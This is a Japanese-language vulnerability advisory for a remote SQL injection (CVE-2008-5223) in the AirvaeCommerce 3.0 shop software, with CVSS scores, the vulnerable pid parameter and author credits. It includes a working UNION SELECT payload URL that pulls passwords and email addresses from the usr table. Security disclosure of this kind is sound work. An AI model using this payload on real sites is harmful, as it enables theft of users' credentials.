重要脆弱性情報 脆弱性名称: AirvaeCommerce 3.0 (pid) リモート SQL インジェクション脆弱性 CVE番号: CVE-2008-5223 CVEタイプ: CWE-89 リスクレベル: High 脆弱性情報の日付: - 公開日: 2008-11-26 - 更新日: 2008-11-27 ローカル脆弱性かどうか: いいえ リモート脆弱性かどうか: はい CVSSスコア CVSSベーススコア: 7.5/10 - 攻撃ベクトル: リモート - 機密性への影響: 部分的 影響度スコア: 6.4/10 - 攻撃難易度: 低 - 完全性への影響: 部分的 利用性スコア: 10/10 - 認証: 不要 - 利用可能性への影響: 部分的 脆弱性の詳細 脆弱なファイル: http://localhost/ path script / ?p=vzh&pid= [SQL] 例: /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/ 注記: 一部のサイトでは、SELECT文の列数が異なり、約45列になっている場合がある。 参考文献 XForce ISS Milw0rm Secunia その他 著者: QTRinux [Qataro (at) hotmail (dot) Com] アプリケーション: AirvaeCommerce 3.0 ダウンロード: http://www.airvaeecommerce.com 価格: $179 モジュール: AirvaeCommerce 3.0 による 謝辞: Allah, InjecTor, AlQaTaRi, all InjEctOrS TeaM, TrYaG TeaM & Muslims Hackers 利用規約**: この脆弱性情報は教育目的のみで提供されており、不正行為に使用することは禁止されています。